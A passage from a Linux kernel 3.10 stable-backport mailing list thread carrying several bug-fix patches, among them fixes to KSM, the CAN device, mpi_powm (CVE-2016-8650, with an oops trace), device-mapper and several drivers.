+			if (!fc->corrupt_bio_byte && !test_bit(DROP_WRITES, &fc->flags))
 				return -EIO;
+			goto map_bio;
 		}
 
 		/*
@@ -331,14 +329,21 @@ static int flakey_end_io(struct dm_target *ti, struct bio *bio, int error)
 	struct flakey_c *fc = ti->private;
 	struct per_bio_data *pb = dm_per_bio_data(bio, sizeof(struct per_bio_data));
 
-	/*
-	 * Corrupt successful READs while in down state.
-	 */
 	if (!error && pb->bio_submitted && (bio_data_dir(bio) == READ)) {
-		if (fc->corrupt_bio_byte)
+		if (fc->corrupt_bio_byte && (fc->corrupt_bio_rw == READ) &&
+		    all_corrupt_bio_flags_match(bio, fc)) {
+			/*
+			 * Corrupt successful matching READs while in down state.
+			 */
 			corrupt_bio_data(bio, fc);
-		else
+
+		} else if (!test_bit(DROP_WRITES, &fc->flags)) {
+			/*
+			 * Error read during the down_interval if drop_writes
+			 * wasn't configured.
+			 */
 			return -EIO;
+		}
 	}
 
 	return error;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (208 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 309/319] dm flakey: fix reads to be issued if drop_writes configured Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off Willy Tarreau
                   ` (8 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: zhong jiang, Andrew Morton, Linus Torvalds, Willy Tarreau

From: zhong jiang <zhongjiang@huawei.com>

commit 5b398e416e880159fe55eefd93c6588fa072cd66 upstream.

I hit the following hung task when running an OOM LTP test case with a 4.1
kernel.

Call trace:
[<ffffffc000086a88>] __switch_to+0x74/0x8c
[<ffffffc000a1bae0>] __schedule+0x23c/0x7bc
[<ffffffc000a1c09c>] schedule+0x3c/0x94
[<ffffffc000a1eb84>] rwsem_down_write_failed+0x214/0x350
[<ffffffc000a1e32c>] down_write+0x64/0x80
[<ffffffc00021f794>] __ksm_exit+0x90/0x19c
[<ffffffc0000be650>] mmput+0x118/0x11c
[<ffffffc0000c3ec4>] do_exit+0x2dc/0xa74
[<ffffffc0000c46f8>] do_group_exit+0x4c/0xe4
[<ffffffc0000d0f34>] get_signal+0x444/0x5e0
[<ffffffc000089fcc>] do_signal+0x1d8/0x450
[<ffffffc00008a35c>] do_notify_resume+0x70/0x78

The oom victim cannot terminate because it needs to take mmap_sem for
write, while the lock is held for read by ksmd, which loops in the page
allocator:

ksm_do_scan
	scan_get_next_rmap_item
		down_read
		get_next_rmap_item
			alloc_rmap_item   #ksmd will loop permanently.

There is no way forward because the oom victim cannot release any memory
in 4.1 based kernel.  Since 4.6 we have the oom reaper which would solve
this problem because it would release the memory asynchronously.
Nevertheless we can relax alloc_rmap_item requirements and use
__GFP_NORETRY because the allocation failure is acceptable as ksm_do_scan
would just retry later after the lock got dropped.

Such a patch would be also easy to backport to older stable kernels which
do not have oom_reaper.

While we are at it, add __GFP_NOWARN so the admin doesn't have to be
alarmed by the allocation failure.

Link: http://lkml.kernel.org/r/1474165570-44398-1-git-send-email-zhongjiang@huawei.com
Signed-off-by: zhong jiang <zhongjiang@huawei.com>
Suggested-by: Hugh Dickins <hughd@google.com>
Suggested-by: Michal Hocko <mhocko@suse.cz>
Acked-by: Michal Hocko <mhocko@suse.com>
Acked-by: Hugh Dickins <hughd@google.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 mm/ksm.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/mm/ksm.c b/mm/ksm.c
index 7bf748f..d1b19b9 100644
--- a/mm/ksm.c
+++ b/mm/ksm.c
@@ -283,7 +283,8 @@ static inline struct rmap_item *alloc_rmap_item(void)
 {
 	struct rmap_item *rmap_item;
 
-	rmap_item = kmem_cache_zalloc(rmap_item_cache, GFP_KERNEL);
+	rmap_item = kmem_cache_zalloc(rmap_item_cache, GFP_KERNEL |
+						__GFP_NORETRY | __GFP_NOWARN);
 	if (rmap_item)
 		ksm_rmap_items++;
 	return rmap_item;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (209 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 310/319] mm,ksm: fix endless looping in allocating memory when ksm enable Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register Willy Tarreau
                   ` (7 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sergei Miroshnichenko, Marc Kleine-Budde, Willy Tarreau

From: Sergei Miroshnichenko <sergeimir@emcraft.com>

commit 9abefcb1aaa58b9d5aa40a8bb12c87d02415e4c8 upstream.

A timer was used to restart after the bus-off state, leading to a
relatively large can_restart() executed in an interrupt context,
which in turn sets up pinctrl. When this happens during system boot,
there is a high probability of grabbing the pinctrl_list_mutex,
which is already locked by the probe() of another device, making the
kernel suspect a deadlock condition [1].

To resolve this issue, the restart_timer is replaced by a delayed
work.

[1] https://github.com/victronenergy/venus/issues/24

Signed-off-by: Sergei Miroshnichenko <sergeimir@emcraft.com>
Signed-off-by: Marc Kleine-Budde <mkl@pengutronix.de>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/net/can/dev.c   | 27 +++++++++++++++++----------
 include/linux/can/dev.h |  3 ++-
 2 files changed, 19 insertions(+), 11 deletions(-)

diff --git a/drivers/net/can/dev.c b/drivers/net/can/dev.c
index 464e5f6..284d751 100644
--- a/drivers/net/can/dev.c
+++ b/drivers/net/can/dev.c
@@ -22,6 +22,7 @@
 #include <linux/slab.h>
 #include <linux/netdevice.h>
 #include <linux/if_arp.h>
+#include <linux/workqueue.h>
 #include <linux/can.h>
 #include <linux/can/dev.h>
 #include <linux/can/skb.h>
@@ -394,9 +395,8 @@ EXPORT_SYMBOL_GPL(can_free_echo_skb);
 /*
  * CAN device restart for bus-off recovery
  */
-static void can_restart(unsigned long data)
+static void can_restart(struct net_device *dev)
 {
-	struct net_device *dev = (struct net_device *)data;
 	struct can_priv *priv = netdev_priv(dev);
 	struct net_device_stats *stats = &dev->stats;
 	struct sk_buff *skb;
@@ -436,6 +436,14 @@ restart:
 		netdev_err(dev, "Error %d during restart", err);
 }
 
+static void can_restart_work(struct work_struct *work)
+{
+	struct delayed_work *dwork = to_delayed_work(work);
+	struct can_priv *priv = container_of(dwork, struct can_priv, restart_work);
+
+	can_restart(priv->dev);
+}
+
 int can_restart_now(struct net_device *dev)
 {
 	struct can_priv *priv = netdev_priv(dev);
@@ -449,8 +457,8 @@ int can_restart_now(struct net_device *dev)
 	if (priv->state != CAN_STATE_BUS_OFF)
 		return -EBUSY;
 
-	/* Runs as soon as possible in the timer context */
-	mod_timer(&priv->restart_timer, jiffies);
+	cancel_delayed_work_sync(&priv->restart_work);
+	can_restart(dev);
 
 	return 0;
 }
@@ -472,8 +480,8 @@ void can_bus_off(struct net_device *dev)
 	priv->can_stats.bus_off++;
 
 	if (priv->restart_ms)
-		mod_timer(&priv->restart_timer,
-			  jiffies + (priv->restart_ms * HZ) / 1000);
+		schedule_delayed_work(&priv->restart_work,
+				      msecs_to_jiffies(priv->restart_ms));
 }
 EXPORT_SYMBOL_GPL(can_bus_off);
 
@@ -556,6 +564,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)
 		return NULL;
 
 	priv = netdev_priv(dev);
+	priv->dev = dev;
 
 	if (echo_skb_max) {
 		priv->echo_skb_max = echo_skb_max;
@@ -565,7 +574,7 @@ struct net_device *alloc_candev(int sizeof_priv, unsigned int echo_skb_max)
 
 	priv->state = CAN_STATE_STOPPED;
 
-	init_timer(&priv->restart_timer);
+	INIT_DELAYED_WORK(&priv->restart_work, can_restart_work);
 
 	return dev;
 }
@@ -599,8 +608,6 @@ int open_candev(struct net_device *dev)
 	if (!netif_carrier_ok(dev))
 		netif_carrier_on(dev);
 
-	setup_timer(&priv->restart_timer, can_restart, (unsigned long)dev);
-
 	return 0;
 }
 EXPORT_SYMBOL_GPL(open_candev);
@@ -615,7 +622,7 @@ void close_candev(struct net_device *dev)
 {
 	struct can_priv *priv = netdev_priv(dev);
 
-	del_timer_sync(&priv->restart_timer);
+	cancel_delayed_work_sync(&priv->restart_work);
 	can_flush_echo_skb(dev);
 }
 EXPORT_SYMBOL_GPL(close_candev);
diff --git a/include/linux/can/dev.h b/include/linux/can/dev.h
index fb0ab65..fb9fbe2 100644
--- a/include/linux/can/dev.h
+++ b/include/linux/can/dev.h
@@ -31,6 +31,7 @@ enum can_mode {
  * CAN common private data
  */
 struct can_priv {
+	struct net_device *dev;
 	struct can_device_stats can_stats;
 
 	struct can_bittiming bittiming;
@@ -42,7 +43,7 @@ struct can_priv {
 	u32 ctrlmode_supported;
 
 	int restart_ms;
-	struct timer_list restart_timer;
+	struct delayed_work restart_work;
 
 	int (*do_set_bittiming)(struct net_device *dev);
 	int (*do_set_mode)(struct net_device *dev, enum can_mode mode);
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (210 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 311/319] can: dev: fix deadlock reported after bus-off Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] Willy Tarreau
                   ` (6 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Michael Walle, Willy Tarreau

From: Michael Walle <michael@walle.cc>

commit b53893aae441a034bf4dbbad42fe218561d7d81f upstream.

According to the datasheet you should only write 1 to this bit. If it is
not set, at least AIN3 will return bad values on newer silicon revisions.

Fixes: d84ca5b345c2 ("hwmon: Add driver for ADT7411 voltage and temperature sensor")
Signed-off-by: Michael Walle <michael@walle.cc>
Signed-off-by: Guenter Roeck <linux@roeck-us.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/hwmon/adt7411.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/hwmon/adt7411.c b/drivers/hwmon/adt7411.c
index d9299dee..dddaa16 100644
--- a/drivers/hwmon/adt7411.c
+++ b/drivers/hwmon/adt7411.c
@@ -30,6 +30,7 @@
 
 #define ADT7411_REG_CFG1			0x18
 #define ADT7411_CFG1_START_MONITOR		(1 << 0)
+#define ADT7411_CFG1_RESERVED_BIT3		(1 << 3)
 
 #define ADT7411_REG_CFG2			0x19
 #define ADT7411_CFG2_DISABLE_AVG		(1 << 5)
@@ -292,8 +293,10 @@ static int adt7411_probe(struct i2c_client *client,
 	mutex_init(&data->device_lock);
 	mutex_init(&data->update_lock);
 
+	/* According to the datasheet, we must only write 1 to bit 3 */
 	ret = adt7411_modify_bit(client, ADT7411_REG_CFG1,
-				 ADT7411_CFG1_START_MONITOR, 1);
+				 ADT7411_CFG1_RESERVED_BIT3
+				 | ADT7411_CFG1_START_MONITOR, 1);
 	if (ret < 0)
 		return ret;
 
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3]
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (211 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 312/319] hwmon: (adt7411) set bit 3 in CFG1 register Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume Willy Tarreau
                   ` (5 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Andrey Ryabinin, David Howells, Dmitry Kasatkin, linux-ima-devel,
	James Morris, Willy Tarreau

From: Andrey Ryabinin <aryabinin@virtuozzo.com>

commit f5527fffff3f002b0a6b376163613b82f69de073 upstream.

This fixes CVE-2016-8650.

If mpi_powm() is given a zero exponent, it wants to immediately return
either 1 or 0, depending on the modulus.  However, if the result was
initialised with zero limb space, no limb space is allocated and a
NULL-pointer exception ensues.

Fix this by allocating a minimal amount of limb space for the result in
the 0-exponent case when the result is 1, and by not touching the limb
space when the result is 0.

This affects the use of RSA keys and X.509 certificates that carry them.

BUG: unable to handle kernel NULL pointer dereference at           (null)
IP: [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
PGD 0
Oops: 0002 [#1] SMP
Modules linked in:
CPU: 3 PID: 3014 Comm: keyctl Not tainted 4.9.0-rc6-fscache+ #278
Hardware name: ASUS All Series/H97-PLUS, BIOS 2306 10/09/2014
task: ffff8804011944c0 task.stack: ffff880401294000
RIP: 0010:[<ffffffff8138ce5d>]  [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
RSP: 0018:ffff880401297ad8  EFLAGS: 00010212
RAX: 0000000000000000 RBX: ffff88040868bec0 RCX: ffff88040868bba0
RDX: ffff88040868b260 RSI: ffff88040868bec0 RDI: ffff88040868bee0
RBP: ffff880401297ba8 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000047 R11: ffffffff8183b210 R12: 0000000000000000
R13: ffff8804087c7600 R14: 000000000000001f R15: ffff880401297c50
FS:  00007f7a7918c700(0000) GS:ffff88041fb80000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000000000000 CR3: 0000000401250000 CR4: 00000000001406e0
Stack:
 ffff88040868bec0 0000000000000020 ffff880401297b00 ffffffff81376cd4
 0000000000000100 ffff880401297b10 ffffffff81376d12 ffff880401297b30
 ffffffff81376f37 0000000000000100 0000000000000000 ffff880401297ba8
Call Trace:
 [<ffffffff81376cd4>] ? __sg_page_iter_next+0x43/0x66
 [<ffffffff81376d12>] ? sg_miter_get_next_page+0x1b/0x5d
 [<ffffffff81376f37>] ? sg_miter_next+0x17/0xbd
 [<ffffffff8138ba3a>] ? mpi_read_raw_from_sgl+0xf2/0x146
 [<ffffffff8132a95c>] rsa_verify+0x9d/0xee
 [<ffffffff8132acca>] ? pkcs1pad_sg_set_buf+0x2e/0xbb
 [<ffffffff8132af40>] pkcs1pad_verify+0xc0/0xe1
 [<ffffffff8133cb5e>] public_key_verify_signature+0x1b0/0x228
 [<ffffffff8133d974>] x509_check_for_self_signed+0xa1/0xc4
 [<ffffffff8133cdde>] x509_cert_parse+0x167/0x1a1
 [<ffffffff8133d609>] x509_key_preparse+0x21/0x1a1
 [<ffffffff8133c3d7>] asymmetric_key_preparse+0x34/0x61
 [<ffffffff812fc9f3>] key_create_or_update+0x145/0x399
 [<ffffffff812fe227>] SyS_add_key+0x154/0x19e
 [<ffffffff81001c2b>] do_syscall_64+0x80/0x191
 [<ffffffff816825e4>] entry_SYSCALL64_slow_path+0x25/0x25
Code: 56 41 55 41 54 53 48 81 ec a8 00 00 00 44 8b 71 04 8b 42 04 4c 8b 67 18 45 85 f6 89 45 80 0f 84 b4 06 00 00 85 c0 75 2f 41 ff ce <49> c7 04 24 01 00 00 00 b0 01 75 0b 48 8b 41 18 48 83 38 01 0f
RIP  [<ffffffff8138ce5d>] mpi_powm+0x32/0x7e6
 RSP <ffff880401297ad8>
CR2: 0000000000000000
---[ end trace d82015255d4a5d8d ]---

Basically, this is a backport of a libgcrypt patch:

	http://git.gnupg.org/cgi-bin/gitweb.cgi?p=libgcrypt.git;a=patch;h=6e1adb05d290aeeb1c230c763970695f4a538526

Fixes: cdec9cb5167a ("crypto: GnuPG based MPI lib - source files (part 1)")
Signed-off-by: Andrey Ryabinin <aryabinin@virtuozzo.com>
Signed-off-by: David Howells <dhowells@redhat.com>
cc: Dmitry Kasatkin <dmitry.kasatkin@gmail.com>
cc: linux-ima-devel@lists.sourceforge.net
Signed-off-by: James Morris <james.l.morris@oracle.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 lib/mpi/mpi-pow.c | 7 ++++++-
 1 file changed, 6 insertions(+), 1 deletion(-)

diff --git a/lib/mpi/mpi-pow.c b/lib/mpi/mpi-pow.c
index 5464c87..e24388a 100644
--- a/lib/mpi/mpi-pow.c
+++ b/lib/mpi/mpi-pow.c
@@ -64,8 +64,13 @@ int mpi_powm(MPI res, MPI base, MPI exp, MPI mod)
 	if (!esize) {
 		/* Exponent is zero, result is 1 mod MOD, i.e., 1 or 0
 		 * depending on if MOD equals 1.  */
-		rp[0] = 1;
 		res->nlimbs = (msize == 1 && mod->d[0] == 1) ? 0 : 1;
+		if (res->nlimbs) {
+			if (mpi_resize(res, 1) < 0)
+				goto enomem;
+			rp = res->d;
+			rp[0] = 1;
+		}
 		res->sign = 0;
 		goto leave;
 	}
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (212 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 313/319] mpi: Fix NULL ptr dereference in mpi_powm() [ver #3] Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling Willy Tarreau
                   ` (4 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Lee Jones, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit 9a6dc644512fd083400a96ac4a035ac154fe6b8d upstream.

set_bit() and clear_bit() take the bit number so this code is really
doing "1 << (1 << irq)" which is a double shift bug.  It's done
consistently so it won't cause a problem unless "irq" is more than 4.

Fixes: 70c6cce04066 ('mfd: Support 88pm80x in 80x driver')
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Lee Jones <lee.jones@linaro.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/linux/mfd/88pm80x.h | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/include/linux/mfd/88pm80x.h b/include/linux/mfd/88pm80x.h
index e94537b..b55c95d 100644
--- a/include/linux/mfd/88pm80x.h
+++ b/include/linux/mfd/88pm80x.h
@@ -345,7 +345,7 @@ static inline int pm80x_dev_suspend(struct device *dev)
 	int irq = platform_get_irq(pdev, 0);
 
 	if (device_may_wakeup(dev))
-		set_bit((1 << irq), &chip->wu_flag);
+		set_bit(irq, &chip->wu_flag);
 
 	return 0;
 }
@@ -357,7 +357,7 @@ static inline int pm80x_dev_resume(struct device *dev)
 	int irq = platform_get_irq(pdev, 0);
 
 	if (device_may_wakeup(dev))
-		clear_bit((1 << irq), &chip->wu_flag);
+		clear_bit(irq, &chip->wu_flag);
 
 	return 0;
 }
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (213 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 314/319] mfd: 88pm80x: Double shifting bug in suspend/resume Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010 Willy Tarreau
                   ` (3 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Peter Ujfalusi, Mark Brown, Willy Tarreau

From: Peter Ujfalusi <peter.ujfalusi@ti.com>

commit a8719670687c46ed2e904c0d05fa4cd7e4950cd1 upstream.

Fixes: ddd17531ad908 ("ASoC: omap-mcpdm: Clean up with devm_* function")

A managed irq request does no good at the ASoC probe level, as it is
not going to free up the irq when the driver is unbound from the sound
card.

Signed-off-by: Peter Ujfalusi <peter.ujfalusi@ti.com>
Reported-by: Russell King <linux@armlinux.org.uk>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 sound/soc/omap/omap-mcpdm.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/sound/soc/omap/omap-mcpdm.c b/sound/soc/omap/omap-mcpdm.c
index eb05c7e..5dc6b23 100644
--- a/sound/soc/omap/omap-mcpdm.c
+++ b/sound/soc/omap/omap-mcpdm.c
@@ -393,8 +393,8 @@ static int omap_mcpdm_probe(struct snd_soc_dai *dai)
 	pm_runtime_get_sync(mcpdm->dev);
 	omap_mcpdm_write(mcpdm, MCPDM_REG_CTRL, 0x00);
 
-	ret = devm_request_irq(mcpdm->dev, mcpdm->irq, omap_mcpdm_irq_handler,
-				0, "McPDM", (void *)mcpdm);
+	ret = request_irq(mcpdm->irq, omap_mcpdm_irq_handler, 0, "McPDM",
+			  (void *)mcpdm);
 
 	pm_runtime_put_sync(mcpdm->dev);
 
@@ -414,6 +414,7 @@ static int omap_mcpdm_remove(struct snd_soc_dai *dai)
 {
 	struct omap_mcpdm *mcpdm = snd_soc_dai_get_drvdata(dai);
 
+	free_irq(mcpdm->irq, (void *)mcpdm);
 	pm_runtime_disable(mcpdm->dev);
 
 	return 0;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (214 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 315/319] ASoC: omap-mcpdm: Fix irq resource handling Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device Willy Tarreau
                   ` (2 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Jan Remmet, Mark Brown, Willy Tarreau

From: Jan Remmet <j.remmet@phytec.de>

commit 8f9165c981fed187bb483de84caf9adf835aefda upstream.

http://www.ti.com/lit/pdf/SWCZ010:
  DCDC o/p voltage can go higher than programmed value

Impact:
VDD1, VDD2, and VIO output programmed voltage level can go higher than
expected or crash, when coming out of PFM to PWM mode or using DVFS.

Description:
When DCDC CLK SYNC bits are 11/01:
* VIO 3-MHz oscillator is the source clock of the digital core and input
  clock of VDD1 and VDD2
* Turn-on of VDD1 and VDD2 HSD PFET is synchronized or at a constant
  phase shift
* Current pulled through VCC1+VCC2 is Iload(VDD1) + Iload(VDD2)
* The 3 HSD PFET will be turned-on at the same time, causing the highest
  possible switching noise on the application. This noise level depends
  on the layout, the VBAT level, and the load current. The noise level
  increases with improper layout.

When DCDC CLK SYNC bits are 00:
* VIO 3-MHz oscillator is the source clock of digital core
* VDD1 and VDD2 are running on their own 3-MHz oscillator
* Current pulled through VCC1+VCC2 is the average of Iload(VDD1) + Iload(VDD2)
* The switching noise of the 3 SMPS will be randomly spread over time,
  causing lower overall switching noise.

Workaround:
Set DCDCCTRL_REG[1:0]= 00.

Signed-off-by: Jan Remmet <j.remmet@phytec.de>
Signed-off-by: Mark Brown <broonie@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/regulator/tps65910-regulator.c | 6 ++++++
 1 file changed, 6 insertions(+)

diff --git a/drivers/regulator/tps65910-regulator.c b/drivers/regulator/tps65910-regulator.c
index 45c1644..1ed4145 100644
--- a/drivers/regulator/tps65910-regulator.c
+++ b/drivers/regulator/tps65910-regulator.c
@@ -1080,6 +1080,12 @@ static int tps65910_probe(struct platform_device *pdev)
 		pmic->num_regulators = ARRAY_SIZE(tps65910_regs);
 		pmic->ext_sleep_control = tps65910_ext_sleep_control;
 		info = tps65910_regs;
+		/* Work around silicon erratum SWCZ010: output programmed
+		 * voltage level can go higher than expected or crash
+		 * Workaround: use no synchronization of DCDC clocks
+		 */
+		tps65910_reg_clear_bits(pmic->mfd, TPS65910_DCDCCTRL,
+					DCDCCTRL_DCDCCKSYNC_MASK);
 		break;
 	case TPS65911:
 		pmic->get_ctrl_reg = &tps65911_get_ctrl_register;
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (215 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 316/319] regulator: tps65910: Work around silicon erratum SWCZ010 Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally Willy Tarreau
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Bart Van Assche, Mike Snitzer, Jiri Slaby, Willy Tarreau

From: Bart Van Assche <bart.vanassche@sandisk.com>

commit 3b785fbcf81c3533772c52b717f77293099498d3 upstream.

This prevents new requests from being queued while __dm_destroy() is in
progress.

[js] use md->queue instead of non-present helper

Signed-off-by: Bart Van Assche <bart.vanassche@sandisk.com>
Signed-off-by: Mike Snitzer <snitzer@redhat.com>
Signed-off-by: Jiri Slaby <jslaby@suse.cz>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/md/dm.c | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/drivers/md/dm.c b/drivers/md/dm.c
index f69fed8..a77ef6c 100644
--- a/drivers/md/dm.c
+++ b/drivers/md/dm.c
@@ -2323,6 +2323,7 @@ EXPORT_SYMBOL_GPL(dm_device_name);
 
 static void __dm_destroy(struct mapped_device *md, bool wait)
 {
+	struct request_queue *q = md->queue;
 	struct dm_table *map;
 
 	might_sleep();
@@ -2333,6 +2334,10 @@ static void __dm_destroy(struct mapped_device *md, bool wait)
 	set_bit(DMF_FREEING, &md->flags);
 	spin_unlock(&_minor_lock);
 
+	spin_lock_irq(q->queue_lock);
+	queue_flag_set(QUEUE_FLAG_DYING, q);
+	spin_unlock_irq(q->queue_lock);
+
 	/*
 	 * Take suspend_lock so that presuspend and postsuspend methods
 	 * do not race with internal suspend.
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 318/319] fbdev/efifb: Fix 16 color palette entry calculation
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (216 preceding siblings ...)
  2017-02-05 19:22 ` [PATCH 3.10 317/319] dm: mark request_queue dead before destroying the DM device Willy Tarreau
@ 2017-02-05 19:22 ` Willy Tarreau
  2017-02-05 19:22 ` [PATCH 3.10 319/319] metag: Only define atomic_dec_if_positive conditionally Willy Tarreau
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:22 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Max Staudt, Tomi Valkeinen, Willy Tarreau

From: Max Staudt <mstaudt@suse.de>

commit d50b3f43db739f03fcf8c0a00664b3d2fed0496e upstream.

When using efifb with a 16-bit (5:6:5) visual, fbcon's text is rendered
in the wrong colors - e.g. text gray (#aaaaaa) is rendered as green
(#50bc50) and neighboring pixels have slightly different values
(such as #50bc78).

The reason is that fbcon loads its 16 color palette through
efifb_setcolreg(), which in turn calculates a 32-bit value to write
into memory for each palette index.
Until now, this code could only handle 8-bit visuals and didn't mask
overlapping values when ORing them.

With this patch, fbcon displays the correct colors when a qemu VM is
booted in 16-bit mode (in GRUB: "set gfxpayload=800x600x16").

Fixes: 7c83172b98e5 ("x86_64 EFI boot support: EFI frame buffer driver")  # v2.6.24+
Signed-off-by: Max Staudt <mstaudt@suse.de>
Acked-By: Peter Jones <pjones@redhat.com>
Signed-off-by: Tomi Valkeinen <tomi.valkeinen@ti.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/video/efifb.c | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/drivers/video/efifb.c b/drivers/video/efifb.c
index 50fe668..08dbe8a 100644
--- a/drivers/video/efifb.c
+++ b/drivers/video/efifb.c
@@ -270,9 +270,9 @@ static int efifb_setcolreg(unsigned regno, unsigned red, unsigned green,
 		return 1;
 
 	if (regno < 16) {
